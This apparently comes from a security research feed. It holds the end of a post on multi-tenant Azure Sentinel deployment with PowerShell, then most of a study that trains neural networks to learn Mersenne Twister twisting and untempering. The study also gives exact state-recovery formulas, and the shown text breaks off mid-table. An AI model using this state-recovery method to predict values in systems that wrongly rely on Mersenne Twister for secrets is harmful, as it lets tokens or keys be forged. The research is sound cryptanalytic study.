                        }
                    ]
                }
            }
        }
    ],
    "outputs": {
        "mspOfferName": {
            "type": "string",
            "value": "[concat('Managed by', ' ', parameters('mspOfferName'))]"
        },
        "authorizations": {
            "type": "array",
            "value": "[parameters('authorizations')]"
        }
    }
}

Enable Connectors

At the time of creating this solution, there were still a few connectors that could not be set via ARM, and I imagine this will still be the case for new connectors as they get added to Sentinel. So I will cover how to handle both deployment types, and how to find out what body to include in the posts to the API.

For most connectors you can use existing solutions such as:

Roberto Rodriguez's Azure-Sentinel2Go

Or

GitHub – javiersoriano/sentinel-all-in-one

First, we install the required modules and get the list of connectors to enable for our client / sub tenant, then compare them to the list of connectors that are already enabled.

param(
    [string]$templateLocation = '',
    [string]$customerConfig 
)
$config = Get-Content -Path $customerConfig |ConvertFrom-Json
$connectors=$config.connectors
$resourceGroupName = $config.TargetResourceGroup
$WorkspaceName = $config.TargetWorkspaceName
$templateLocation

Install-Module AzSentinel -Scope CurrentUser -Force

$connectorList = $connectors -split ','
$rg = Get-AzResourceGroup -Name $resourceGroupName
$check = Get-AzSentinelDataConnector -WorkspaceName $WorkspaceName | select-object -ExpandProperty kind
$outputArray = $connectorList | Where-Object {$_ -notin $check} 
$tenantId = (get-azcontext).Tenant.Id
$subscriptionId = (Get-AzSubscription).Id

$Resource = "https://management.azure.com/"

Next, we attempt to deploy the connectors using the ARM templates from one of the above solutions.

foreach ($con in $outputArray) {
    Write-Host "deploying $($con)"
    $out = $null
    $out = New-AzResourceGroupDeployment -ResourceGroupName "$($resourceGroupName)" -TemplateFile $templateLocation -dataConnectorsKind "$($con)" -workspaceName "$($WorkspaceName)" -securityCollectionTier "ALL" -tenantId "$($tenantId)" -subscriptionId "$($subscriptionId)" -mcasDiscoveryLogs $true -Location $rg.Location -ErrorAction SilentlyContinue
    if ($out.ProvisioningState -eq "Failed") {
        Write-Host '------------------------'
        Write-Host "Unable to deploy $($con)"
        $out | Format-Table
        Write-Host '------------------------'
        Write-Host "##vso[task.LogIssue type=warning;]Unable to deploy $($con) CorrelationId: $($out.CorrelationId)"
    }
    else {
        Write-Host "deployed $($con)"
    }
}

If the connector fails to deploy, we write a warning message to the pipeline.

This will work for most connectors and might be all you need for your requirements.

If there is a connector that is not currently available, as the Active Directory Diagnostics connector was when I created this, we need to use a different approach. Thanks to Roberto Rodriguez for the suggestion.

  1. Using your favourite Browser, go to an existing Sentinel instance that allows you to enable the connector you need.
  2. Go through the steps of enabling the connector. On the last step, when submitting, open the debug console (dev tools) in your browser and, on the Network tab, look through the POSTs made.
  3. There should be one containing the payload for the connector you just enabled with the correct settings and URL to post to.
  4. Now we can replicate this payload in PowerShell and enable them automatically.

When enabling the connector, note the required permissions needed and ensure your ADO service connection meets the requirements!

Create the URI using the URL from the post message, replacing required values such as workspace name with the one used for your target environment

Example:

$uri = "/providers/microsoft.aadiam/diagnosticSettings/AzureSentinel_$($WorkspaceName)?api-version=2017-04-01"

Build up the JSON post message starting with static bits

        $payload = '{
            "kind": "AzureActiveDirectoryDiagnostics",
            "properties": {
                "logs": [
                    {
                        "category": "SignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "AuditLogs",
                        "enabled": true
                    },
                    {
                        "category": "NonInteractiveUserSignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ServicePrincipalSignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ManagedIdentitySignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ProvisioningLogs",
                        "enabled": true
                    }
                ]
            }
        }'|ConvertFrom-Json

Add additional required properties that were not included in the static part:

        $connectorProperties = $payload.properties
        $connectorProperties | Add-Member -NotePropertyName workspaceId -NotePropertyValue "/subscriptions/$($subscriptionId)/resourceGroups/$($resourceGroupName)/providers/Microsoft.OperationalInsights/workspaces/$($WorkspaceName)"

        # Build the body as a hashtable so both keys survive ConvertTo-Json
        $connectorBody = @{
            name       = "AzureSentinel_$($WorkspaceName)"
            properties = $connectorProperties
        }

And finally, try firing the request at Azure with a bit of error handling to write a warning to the pipeline if something goes wrong.

        try {
            $result = Invoke-AzRestMethod -Path $uri -Method PUT -Payload ($connectorBody | ConvertTo-Json -Depth 3)
            if ($result.StatusCode -eq 200) {
                Write-Host "Successfully enabled data connector: $($payload.kind)"
            }
            else {
                Write-Host  "##vso[task.LogIssue type=warning;]Unable to deploy $($con)  with error: $($result.Content)" 
            }
        }
        catch {
            $errorReturn = $_
            Write-Verbose $_
            Write-Host  "##vso[task.LogIssue type=warning;]Unable to deploy $($con)  with error: $errorReturn" 
        }

Phase 2: Deploy Sentinel analytics to Master tenant pointed at Sub tenant logs

If you followed all the above steps, onboarded a sub tenant, and are in the Azure AD group, you should now be able to see the sub tenant's Log Analytics workspace in your Master Tenant Sentinel. At this stage you can also remove the service principal in the sub tenant.

If you cannot see it:

  • It sometimes takes 30+ minutes for Lighthouse connected tenants to show up in the master tenant.
  • Ensure you have the sub tenant selected in "Directories + Subscriptions".
  • In Sentinel, make sure the subscription is selected in your filter.

Deploying a new analytic

First load a template analytic.

If you just exported the analytics from an existing Sentinel instance, you only need to make sure you set the workspace inside the query to the correct one.

$alert = (Get-Content -Path $file.FullName) | ConvertFrom-Json
$analyticsTemplate = $alert.detection_query -replace '{{targetWorkspace}}', ($config.TargetWorkspaceName)

In my case, I am loading a custom analytics file, so I need to combine it with my template file and set a few more bits.

$alert = (Get-Content -Path $file.FullName) | ConvertFrom-Json
$workspaceName = '$(naming.LogAnalyticsWorkspace)'
$resourceGroupName = '$(naming.CustomerResourceGroup)'
$id = New-Guid
$analyticsTemplate = (Get-Content -Path $detectionPath) -replace '{DisplayPrefix}', 'Sentinel-' -replace '{DisplayName}', $alert.display_name -replace '{DetectionName}', $alert.detection_name -replace '{{targetWorkspace}}', ($config.TargetWorkspaceName) | ConvertFrom-Json

$QueryPeriod = ([timespan]$alert.Interval)
$lookbackPeriod = ([timespan]$alert.LookupPeriod)
$SuppressionDuration = ([timespan]$alert.LookupPeriod)

$alert.detection_query = $alert.detection_query -replace '{{targetWorkspace}}', ($config.TargetWorkspaceName)
$alert.detection_query
$tempDescription = $alert.description
$analyticsTemplate.Severity = $alert.severity

Create the analytic in Sentinel

When creating the analytics, you can either

  1. put them directly into the Analytics workspace that is now visible in the Master tenant through Lighthouse
  2. create a new workspace, and point the analytics at the other workspace by adding workspace(targetworkspace) to all tables in your analytics for example workspace(targetworkspace).DeviceEvents.

The latter solution keeps all the analytics in the Master tenant, so all queries can be stored there and do not go into the sub tenant (can be useful for protecting intellectual property or just having all analytics in one single workspace pointing at all the others).

At the time of creating the automated solution for this, I had a few issues with the various ways of deploying analytics, which have hopefully been solved by now. Below is my workaround that is still fully functional.

  • The Az.SecurityInsights version of New-AzSentinelAlertRule did not allow me to set tactics on the analytic.
  • The azsentinel version did have a working way to add tactics, but failed to create the analytic properly
  • Neither of them worked with adding entities.

So in a rather unpleasant solution I:

  1. Create the initial analytic using Az.SecurityInsights\New-AzSentinelAlertRule
  2. Add the tactic in using azsentinel\New-AzSentinelAlertRule
  3. Add the entities and final settings in using the API
Az.SecurityInsights\New-AzSentinelAlertRule -WorkspaceName $workspaceName -QueryPeriod $lookbackPeriod -Query $analyticsTemplate.detection_query -QueryFrequency $QueryPeriod -ResourceGroupName $resourceGroupName -AlertRuleId $id -Scheduled -Enabled -DisplayName $analyticsTemplate.DisplayName -Description $tempDescription -SuppressionDuration $SuppressionDuration -Severity $analyticsTemplate.Severity -TriggerOperator $analyticsTemplate.TriggerOperator -TriggerThreshold $analyticsTemplate.TriggerThreshold

$newAlert = azsentinel\Get-AzSentinelAlertRule -WorkspaceName $workspaceName | Where-Object { $_.name -eq $id }
$newAlert.Query = $alert.detection_query
$newAlert.enabled = $analyticsTemplate.Enabled

azsentinel\New-AzSentinelAlertRule -WorkspaceName $workspaceName -Kind $newAlert.kind -SuppressionEnabled $newAlert.suppressionEnabled -Query $newAlert.query -DisplayName $newAlert.displayName -Description $newAlert.description -Tactics $newAlert.tactics -QueryFrequency $newAlert.queryFrequency -Severity $newAlert.severity -Enabled $newAlert.enabled -QueryPeriod $newAlert.queryPeriod -TriggerOperator $newAlert.triggerOperator -TriggerThreshold $newAlert.triggerThreshold -SuppressionDuration $newAlert.suppressionDuration

$additionUri = $newAlert.id + '?api-version=2021-03-01-preview'
$additionUri
$result = Invoke-AzRestMethod -Path $additionUri -Method Get
$entityCont = '[]' | ConvertFrom-Json
$entities = $alert.analyticsEntities.entityMappings | ConvertTo-Json -Depth 4
$content = $result.Content | ConvertFrom-Json
$tactics = $alert.tactic.Split(',') | ConvertTo-Json
$aggregation = 'SingleAlert'
if ($alert.Grouping -eq 'AlertPerResult') {
    $aggregation = 'AlertPerResult'
}

      $body = '{"id":"'+$content.id+'","name":"'+$content.name+'","type":"Microsoft.SecurityInsights/alertRules","kind":"Scheduled","properties":{"displayName":"'+$content.properties.displayName+'","description":"'+$content.properties.description+'","severity":"'+$content.properties.severity+'","enabled":true,"query":'+($content.properties.query |ConvertTo-Json)+',"queryFrequency":"'+$content.properties.queryFrequency+'","queryPeriod":"'+$content.properties.queryPeriod+'","triggerOperator":"'+$content.properties.triggerOperator+'","triggerThreshold":'+$content.properties.triggerThreshold+',"suppressionDuration":"'+$content.properties.suppressionDuration+'","suppressionEnabled":false,"tactics":'+$tactics+',"alertRuleTemplateName":null,"incidentConfiguration":{"createIncident":true,"groupingConfiguration":{"enabled":false,"reopenClosedIncident":false,"lookbackDuration":"PT5H","matchingMethod":"AllEntities","groupByEntities":[],"groupByAlertDetails":[],"groupByCustomDetails":[]}},"eventGroupingSettings":{"aggregationKind":"'+$aggregation+'"},"alertDetailsOverride":null,"customDetails":null,"entityMappings":'+ $entities +'}}'
     
$res = Invoke-AzRestMethod -Path $additionUri -Method Put -Payload $body

You should now have all the components needed to create your own multi-Tenant enterprise scale pipelines.

The value from this solution comes from:

  1. Being able to quickly push custom made analytics to a multitude of workspaces
  2. Being able to source control analytics and code review them before deploying
  3. Having the ability to manage all sub tenants from the same master tenant without having to create accounts in each tenant
  4. Consistent RBAC for all tenants
  5. A huge amount of room to extend on this solution.


As mentioned at the start, this blog post only covers a small part of the overall deployment strategy we have at NCC Group, to illustrate the overall deployment workflow we’ve taken for Azure Sentinel. Upon this foundation, we’ve built a substantial ecosystem of custom analytics to support advanced detection and response.

✇ NCC Group Research

Cracking Random Number Generators using Machine Learning – Part 2: Mersenne Twister

By: Mostafa Hassan

Outline

1. Introduction

In part 1 of this post, we showed how to train a Neural Network to generate the exact sequence of a relatively simple pseudo-random number generator (PRNG), namely xorshift128. In that PRNG, each number is totally dependent on the last four generated numbers (which form the random number internal state). Although ML had learned the hidden internal structure of the xorshift128 PRNG, it is a very simple PRNG that we used as a proof of concept.

The same concept applies to a more complex structured PRNG, namely Mersenne Twister (MT). MT is by far the most widely used general-purpose (but still: not cryptographically secure) PRNG [1]. It can have a very long period (2^19937 - 1 for the most common variant) and produces 32-bit words with a statistically uniform distribution. There are many variants of the MT PRNG that follow the same algorithm but differ in the constants and configurations of the algorithm. The most commonly used variant of MT is MT19937. Hence, for the rest of this article, we will focus on this variant of MT.

To crack the MT algorithm, we first need to examine how it works. In the next section, we will discuss how MT works.

** Editor’s Note: How does this relate to security? While both the research in this blog post (and that of Part 1 in this series) looks at a non-cryptographic PRNG, we are interested, generically, in understanding how machine learning-based approaches to finding latent patterns within functions presumed to be generating random output could work, as a prerequisite to attempting to use machine learning to find previously-unknown patterns in cryptographic (P)RNGs, as this could potentially serve as an interesting supplementary method for cryptanalysis of these functions. Here, we show our work in beginning to explore this space, extending the approach used for xorshift128 to Mersenne Twister, a non-cryptographic PRNG sometimes mistakenly used where a cryptographically-secure PRNG is required. **

2. How does MT19937 PRNG work?

MT can be considered a twisted form of the generalized linear-feedback shift register (LFSR). The idea of an LFSR is to use a linear function, such as XOR, with the old register value to get the register's new value. In MT, the internal state is saved in the form of a sequence of 32-bit words. The size of the internal state differs based on the MT variant; in the case of MT19937 it is 624 words. The pseudocode of MT is listed below, as shared on Wikipedia.

 // Create a length n array to store the state of the generator
 int[0..n-1] MT
 int index := n+1
 const int lower_mask = (1 << r) - 1 // That is, the binary number of r 1's
 const int upper_mask = lowest w bits of (not lower_mask)
 
 // Initialize the generator from a seed
 function seed_mt(int seed) {
     index := n
     MT[0] := seed
     for i from 1 to (n - 1) { // loop over each element
         MT[i] := lowest w bits of (f * (MT[i-1] xor (MT[i-1] >> (w-2))) + i)
     }
 }
 
 // Extract a tempered value based on MT[index]
 // calling twist() every n numbers
 function extract_number() {
     if index >= n {
         if index > n {
           error "Generator was never seeded"
           // Alternatively, seed with constant value; 5489 is used in reference C code
         }
         twist()
     }
 
     int y := MT[index]
     y := y xor ((y >> u) and d)
     y := y xor ((y << s) and b)
     y := y xor ((y << t) and c)
     y := y xor (y >> l)
 
     index := index + 1
     return lowest w bits of (y)
 }
 
 // Generate the next n values from the series x_i 
 function twist() {
     for i from 0 to (n-1) {
         int x := (MT[i] and upper_mask)
                   + (MT[(i+1) mod n] and lower_mask)
         int xA := x >> 1
         if (x mod 2) != 0 { // lowest bit of x is 1
             xA := xA xor a
         }
         MT[i] := MT[(i + m) mod n] xor xA
     }
     index := 0
 } 

The first function is seed_mt, used to initialize the 624 state values using the initial seed and the linear XOR function. This function is straightforward, but we will not go into the details of its implementation as it is irrelevant to our goal. The two main functions we have are extract_number and twist. The extract_number function is called every time we want to generate a new random value. It starts by checking whether the state is initialized; if it is not, it either initializes it by calling seed_mt with a constant seed or returns an error. Then the first step is to call the twist function to twist the internal state, as we will describe later. This twist is also called after every 624 calls to the extract_number function. After that, the code uses the number at the current index (which starts at 0 and goes up to 623) to temper one word from the state at that index using some linear XOR, SHIFT, and AND operations. At the end of the function, we increment the index and return the tempered state value.

The twist function changes the internal states to a new state at the beginning and after every 624 numbers generated. As we can see from the code, the function uses the values at indices i, i+1, and i+m to generate the new value at index i using some XOR, SHIFT, and AND operations similar to the tempering function above.

Please note that w, n, m, r, a, u, d, s, b, t, c, l, and f are predefined constants for the algorithm that may change from one version to another. The values of these constants for MT19937 are as follows:

  • (w, n, m, r) = (32, 624, 397, 31)
  • a = 0x9908B0DF
  • (u, d) = (11, 0xFFFFFFFF)
  • (s, b) = (7, 0x9D2C5680)
  • (t, c) = (15, 0xEFC60000)
  • l = 18
  • f = 1812433253
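To make the algorithm concrete, the pseudocode and the MT19937 constants above translate directly into Python. The following is a small sketch for experimentation (the class name is our own), mirroring the listing above rather than any production implementation:

```python
class MT19937:
    # MT19937 constants, as listed above
    w, n, m, r = 32, 624, 397, 31
    a = 0x9908B0DF
    u, d = 11, 0xFFFFFFFF
    s, b = 7, 0x9D2C5680
    t, c = 15, 0xEFC60000
    l = 18
    f = 1812433253
    lower_mask = (1 << r) - 1                 # 0x7FFFFFFF: the r lowest bits
    upper_mask = (~lower_mask) & 0xFFFFFFFF   # 0x80000000: the MSB only

    def __init__(self, seed=5489):
        # seed_mt: fill the 624-word state from the seed
        self.mt = [0] * self.n
        self.mt[0] = seed
        for i in range(1, self.n):
            prev = self.mt[i - 1]
            self.mt[i] = (self.f * (prev ^ (prev >> (self.w - 2))) + i) & 0xFFFFFFFF
        self.index = self.n  # force a twist on the first extraction

    def twist(self):
        # Twist the whole internal state in place
        for i in range(self.n):
            x = (self.mt[i] & self.upper_mask) + (self.mt[(i + 1) % self.n] & self.lower_mask)
            xA = x >> 1
            if x & 1:  # lowest bit of x is 1
                xA ^= self.a
            self.mt[i] = self.mt[(i + self.m) % self.n] ^ xA
        self.index = 0

    def extract_number(self):
        if self.index >= self.n:
            self.twist()
        # Tempering: XOR/SHIFT/AND the state word at the current index
        y = self.mt[self.index]
        y ^= (y >> self.u) & self.d
        y ^= (y << self.s) & self.b
        y ^= (y << self.t) & self.c
        y ^= y >> self.l
        self.index += 1
        return y & 0xFFFFFFFF
```

Seeded with the reference default of 5489, the first extracted value is 3499211612, matching the well-known MT19937 test vectors.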

3. Using Neural Networks to model the MT19937 PRNG

As we saw in the previous section, MT can be split into two main steps: twisting and tempering. The twisting step only happens once every n calls to the PRNG (where n equals 624 in MT19937) to twist the old state into a new state. The tempering step happens with each number generated to convert one of the 624 states to a random number. Hence, we are planning to use two NN models to learn each step separately. We will then use the two models to reverse the whole PRNG: the reverse-tempering model gets us from a generated number back to its internal state, and the twisting model produces the new state. Then, we can temper the generated state to get to the expected new PRNG number.
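As an aside, the tempering step is exactly invertible with bit arithmetic, so the mapping that a reverse-tempering model has to learn is well defined. A Python sketch of the forward temper and its exact inverse, using the MT19937 tempering constants (our own helper names):

```python
# MT19937 tempering constants (u, d), (s, b), (t, c), l
U, D = 11, 0xFFFFFFFF
S, B = 7, 0x9D2C5680
T, C = 15, 0xEFC60000
L = 18
MASK32 = 0xFFFFFFFF

def temper(y):
    """Tempering step of extract_number: state word -> output word."""
    y ^= (y >> U) & D
    y ^= (y << S) & B
    y ^= (y << T) & C
    y ^= y >> L
    return y & MASK32

def untemper(y):
    """Exact inverse of temper: output word -> state word."""
    y ^= y >> L            # shift 18 > 16, so a single round undoes it
    y ^= (y << T) & C      # shift 15: one round suffices (mask bits 15-16 are 0)
    x = y
    for _ in range(5):     # each round recovers 7 more low-order bits
        x = y ^ ((x << S) & B)
    y = x & MASK32
    x = y
    for _ in range(3):     # each round recovers 11 more high-order bits
        x = y ^ ((x >> U) & D)
    return x & MASK32
```

The iterative rounds work because each XOR-shift only mixes bits across a fixed distance, so known bits propagate shift-width at a time until all 32 are recovered.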

3.1 Using NN for State Twisting

After checking the code listing of the twist function above, we can see that the new state at position i depends on the variable xA and the value of the old state at position (i + m), where m equals 397 in MT19937. Also, the value of xA depends on the value of the variable x and the constant a. And the value of the variable x depends on the old state's values at positions i and i + 1.

Hence, we can deduce that, and without getting into the details, each new twisted state depends on three old states as follows:

MT[i] = f(MT[i - 624], MT[i - 624 + 1], MT[i - 624 + m])

    = f(MT[i - 624], MT[i - 623], MT[i - 227])     ( using m = 397 as in MT19937 )

We want to train an NN model to learn the function f hence effectively replicating the twisting step. To accomplish this, we have created a different function that generates the internal state (without tempering) instead of the random number. This allows us to correlate the internal states with each other, as described in the above formula.
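For reference, in the standard MT19937 description the function f that the model is asked to learn is the following (a sketch shown here only to make explicit what "ground truth" the training data encodes; the NN itself is trained without any knowledge of it):

```python
UPPER, LOWER = 0x80000000, 0x7FFFFFFF
A = 0x9908B0DF  # the constant a

def f(s_624, s_623, s_227):
    """New state MT[i] from MT[i - 624], MT[i - 623] and MT[i - 227]."""
    x = (s_624 & UPPER) | (s_623 & LOWER)  # MSB of the first state, low 31 bits of the second
    return s_227 ^ (x >> 1) ^ ((x & 1) * A)
```

Note that only the MSB of the first argument and the low 31 bits of the second ever enter the computation, a fact the trained model rediscovers in Section 3.1.3.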

3.1.1 Data Preparation

We have generated a sequence of 5,000,000 32-bit state words. We then formatted these states into three 32-bit inputs and one 32-bit output, creating a dataset of around five million records (5,000,000 - 624). We then split the data into training and testing sets, using only 100,000 records for the test set and the rest for training.

3.1.2 Neural Network Model Design

Our proposed model would have 96 inputs in the input layer to represent the three old states at the specific locations described in the previous equation, 32 bits each, and 32 outputs in the output layer to represent the new 32-bit state. The main hyperparameters that we need to decide are the number of hidden layers and the number of neurons/nodes in each. We tested model structures with different numbers of hidden layers and neurons per layer, then used Keras Tuner's BayesianOptimization to select the optimal number of hidden layers/neurons along with other optimization parameters (such as the learning rate), using a small subset of the training set for this search. We got multiple promising model structures and used the smallest one with the most promising results.

3.1.3 Optimizing the NN Inputs

After training multiple models, we noticed that the weights connecting the first 31 of the 96 input bits to the first hidden layer's nodes are almost always close to zero. This implies that those bits have no effect on the output bits, and hence we can ignore them in training. Checking this observation against the MT implementation, we found that the state at position i is bitwise ANDed with a bitmask called upper_mask, which has a 1 in the MSB and 0s everywhere else when r is 31, as in MT19937. So, we only need the MSB of the state at position i, and we can train our NN with only 65-bit inputs instead of 96.

Hence, our neural network structure ended up with the following model structure (the input layer is ignored):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 96)                6336      
_________________________________________________________________
dense_1 (Dense)              (None, 32)                3104      
=================================================================
Total params: 9,440
Trainable params: 9,440
Non-trainable params: 0
_________________________________________________________________

As we can see, the hidden layer has only 6,336 parameters (65×96 weights + 96 biases) and the output layer has 3,104 (96×32 weights + 32 biases), for a total of 9,440 trainable parameters. The hidden layer activation function is relu, while the output layer activation function is sigmoid, as we expect a binary output. Here is a summary of the model parameters:

Twisting Model
  • Model Type: Dense Network
  • #Layers: 2
  • #Neurons: 128 (Dense)
  • #Trainable Parameters: 9,440
  • Activation Functions: relu (hidden layer), sigmoid (output layer)
  • Loss Function: binary_crossentropy

3.1.4 Model Results

After a few hours and manual tweaking of the model architecture, we trained a model that achieved 100% bitwise accuracy on both the training and testing sets. To be more confident in this result, we generated a new sample of 1,000,000 states using a different seed than the one used for the previous data, and again got 100% bitwise accuracy.

This means that the model has learned the exact formula that relates each state to the three previous states. Hence, if we have access to the three internal states at those specific locations, we can predict the next state. But usually we only have access to the old random numbers, not the internal states. So, we need a different model that can reverse a generated (tempered) number to its equivalent internal state; we can then use the twisting model to create the new state and apply the normal tempering step to get the next output. But before we get to that, let's do a model deep dive.

3.1.5 Model Deep Dive

This section deep dives into the model to better understand what it has learned from the state-relations data and whether it matches our expectations.

3.1.5.1 Model First Layer Connections

As discussed earlier, each state depends on three previous states, and we showed that we only need the MSB (most significant bit) of the first state; hence we have 65 bits as input. Now, we would like to examine whether all 65 input bits have the same effect on the 32 output bits. In other words, do all the input bits have more or less the same importance for the outputs? We can use the weights of our trained model that connect the 65 inputs to the 96 hidden nodes to determine the importance of each bit. The following figure shows the weights connecting each input, on the x-axis, to the 96 hidden nodes:

We can notice that the second input bit, which corresponds to the second state's LSB, is connected to many hidden layer nodes, implying that it affects multiple output bits. Comparing this observation with the code listed in Section 2, it corresponds to the if-condition that checks the LSB and, based on its value, XORs the new state with a constant value that dramatically affects the new state.

We can also notice that the 33rd input, marked on the figure, is almost not connected to any hidden layer nodes, as all its weights are close to zero. This maps to line 12 of the code, where the second state is bitmasked with 0x7FFFFFFF (in MT19937), which discards its MSB altogether.

3.1.5.2 The Logic Closed-Form from the State Twisting Model Output

After creating a model that can replicate the twist operation on the states, we would like to see if we can derive the logic closed-form from the trained model. Of course, we could derive it by enumerating all 65-bit input variations and testing each combination's outputs (2^65 evaluations), but this approach is infeasible. Instead, we can test the effect of each input bit on each output bit separately. This can be done by toggling each input bit individually, once at 0 and once at 1, and observing which output bits change. For example, when we checked the first input, which corresponds to the MSB of the first state, we found that it only affects bit 30 in the output. The following table shows the effect of each input bit on each output bit:

Input Bits Output Bits
0   [30]
1   [0, 1, 2, 3, 4, 6, 7, 12, 13, 15, 19, 24, 27, 28, 31]
2   [0]
3   [1]
4   [2]
5   [3]
6   [4]
7   [5]
8   [6]
9   [7]
10   [8]
11   [9]
12   [10]
13   [11]
14   [12]
15   [13]
16   [14]
17   [15]
18   [16]
19   [17]
20   [18]
21   [19]
22   [20]
23   [21]
24   [22]
25   [23]
26   [24]
27   [25]
28   [26]
29   [27]
30   [28]
31   [29]
32   []
33   [0]
34   [1]
35   [2]
36   [3]
37   [4]
38   [5]
39   [6]
40   [7]
41   [8]
42   [9]
43   [10]
44   [11]
45   [12]
46   [13]
47   [14]
48   [15]
49   [16]
50   [17]
51   [18]
52   [19]
53   [20]
54   [21]
55   [22]
56   [23]
57   [24]
58   [25]
59   [26]
60   [27]
61   [28]
62   [29]
63   [30]
64   [31]

We can see that inputs 33 to 64, which correspond to the last state, affect bits 0 to 31 in the output. We can also see that inputs 2 to 31, which correspond to bits 1 to 30 of the second state (ignoring its LSB and MSB), affect bits 0 to 29 in the output. And as we know, the state evaluation uses the XOR logic function. We can formalize the closed-form as follows (ignoring input bits 0 and 1 for now):

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1)

This formula is close to the final result; we still need to add the effects of input bits 0 and 1. Input bit 0, which corresponds to the first state's MSB, affects output bit 30 (the MSB moves one position to the right). Hence we can update the closed-form to:

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i - 624] & 0x80000000) >> 1)

Lastly, input bit 1, which corresponds to the second state's LSB, affects 15 bits in the output. As it enters through an XOR, if this bit is 0 it does not affect the output, but if it is 1 it flips all 15 listed bits. Assembling these 15 bit positions into a hexadecimal value gives 0x9908B0DF, which is the constant a in MT19937. We can then include this in the closed-form as follows:

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i - 624] & 0x80000000) >> 1) ^ ((MT[i - 623] & 1) * 0x9908B0DF)

So, if the LSB of the second state is 0, the result of the AND is 0 and the multiplication yields 0; but if the LSB is 1, the AND yields 1 and the multiplication yields 0x9908B0DF. This is equivalent to the if-condition in the code listing. We can rewrite the above equation over the circular state buffer as follows:

          MT[i] = MT[(i + 397) % 624] ^ ((MT[(i + 1) % 624] & 0x7FFFFFFF) >> 1) ^ ((MT[i] & 0x80000000) >> 1) ^ ((MT[(i + 1) % 624] & 1) * 0x9908B0DF)

Now let’s check how to reverse the tempered numbers to the internal states using an ML model.

3.2 Using NN for State Tempering

We plan to train a neural network model to reverse the state tempering introduced in the code listing (lines 10 to 20). As we can see, a series of XORs and shifts is applied to the state at the current index to generate the random number. So, we updated the code to emit the state both before and after tempering, to be used as inputs and outputs for the neural network.
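For context, the tempering step and its exact algebraic inverse look as follows (a standard derivation, included only as the baseline the NN is expected to rediscover on its own; function names are ours):

```python
M32 = 0xFFFFFFFF

def temper(y):
    y ^= y >> 11
    y = (y ^ ((y << 7) & 0x9D2C5680)) & M32
    y = (y ^ ((y << 15) & 0xEFC60000)) & M32
    return y ^ (y >> 18)

def untemper(y):
    y ^= y >> 18                              # shift >= 16, so this step is self-inverse
    y = (y ^ ((y << 15) & 0xEFC60000)) & M32  # likewise self-inverse under a 32-bit mask
    z = y
    for _ in range(5):                        # fixed-point iteration: 7 more low bits per round
        z = (y ^ ((z << 7) & 0x9D2C5680)) & M32
    v = z
    for _ in range(3):                        # same idea: 11 more high bits per round
        v = z ^ (v >> 11)
    return v & M32
```

Because every tempering step is an invertible linear map over GF(2), untemper(temper(v)) == v for every 32-bit v, which is exactly the bijection the reverse-tempering model has to learn.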

3.2.1 Data Preparation

We have generated a sequence of 5,000,000 32-bit state words and their tempered values. We then used the tempered states as inputs and the original states as outputs, creating a dataset of 5 million records. We then split the data into training and testing sets, using only 100,000 records for the test set and the rest for training.

3.2.2 Neural Network Model Design

Our proposed model would have 32 inputs in the input layer to represent the tempered state value and 32 outputs in the output layer to represent the original 32-bit state. The main hyperparameters that we need to decide are the number of hidden layers and the number of neurons/nodes in each. We tested model structures with different numbers of hidden layers and neurons per layer, similar to the previous NN model, and again used the smallest model structure that had the most promising results. Hence, our neural network ended up with the following structure (the input layer is not shown):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 640)               21120     
_________________________________________________________________
dense_1 (Dense)              (None, 32)                20512     
=================================================================
Total params: 41,632
Trainable params: 41,632
Non-trainable params: 0
_________________________________________________________________

As we can see, the hidden layer has 21,120 parameters (32×640 weights + 640 biases) and the output layer has 20,512 (640×32 weights + 32 biases), for a total of 41,632 trainable parameters. This model is much bigger than the twisting model, as the tempering operations are much more complex than those in twisting. Similarly, the hidden layer activation function is relu and the output layer activation function is sigmoid, as we expect a binary output. Here is a summary of the model parameters:

Tempering Model
  • Model Type: Dense Network
  • #Layers: 2
  • #Neurons: 672 (Dense)
  • #Trainable Parameters: 41,632
  • Activation Functions: relu (hidden layer), sigmoid (output layer)
  • Loss Function: binary_crossentropy

3.2.3 Model Results

After manual tweaking of the model architecture, we trained a model that achieved 100% bitwise accuracy on both the training and testing sets. To be more confident in this result, we generated a new sample of 1,000,000 states and tempered states using a different seed than those used for the previous data, and again got 100% bitwise accuracy.

This means that the model has learned the exact inverse formula that maps each tempered value back to its original state. Hence, we can use this model to reverse generated numbers into the internal states needed by the first model, use the twisting model to produce the new state, and then apply the normal tempering step to get the next output. But before we get to that, let's do a model deep dive.

3.2.4 Model Deep Dive

This section deep dives into the model to better understand what it has learned from the state-relations data and whether it matches our expectations.

3.2.4.1 Model Layers Connections

After training the model, we wanted to test whether any input bits are unused or less connected. The following figure shows the weights connecting each input, on the x-axis, to the 640 hidden nodes in the hidden layer (each point represents a hidden node's weight):

As we can see, each input bit is connected to many hidden nodes, which implies that each input bit has roughly the same importance as the others. We also plot, in the following figure, the connections between the hidden layer and the output layer:

The same observation can be made from this figure, except that bits 29 and 30 are perhaps less connected than the others, though they are still well connected to many hidden nodes.

3.2.4.2 The Logic Closed-Form from the State Tempering Model Output

In the same way as we did with the first model, we can derive a closed-form logic expression that reverses the tempering using the model output. But instead, we can derive a closed-form expression that takes the generated numbers at the positions mentioned in the first part, reverses them to internal states, generates the new state, and produces the new number in one step. So, we plan to connect three copies of the reverse-tempering model to the model that generates the new state, and then temper its output to get the newly generated number, as shown in the following figure:

Now we have 3 × 32 input bits and 32 output bits. Using the same approach described before, we can test the effect of each input bit on each output bit separately. The following table shows the input-output relations:

Input Index Input Bits Output Bits
0 0   []
0 1   []
0 2   [1, 8, 12, 19, 26, 30]
0 3   []
0 4   []
0 5   []
0 6   []
0 7   []
0 8   []
0 9   [1, 8, 12, 19, 26, 30]
0 10   []
0 11   []
0 12   []
0 13   []
0 14   []
0 15   []
0 16   [1, 8, 12, 19, 26, 30]
0 17   [1, 8, 12, 19, 26, 30]
0 18   []
0 19   []
0 20   [1, 8, 12, 19, 26, 30]
0 21   []
0 22   []
0 23   []
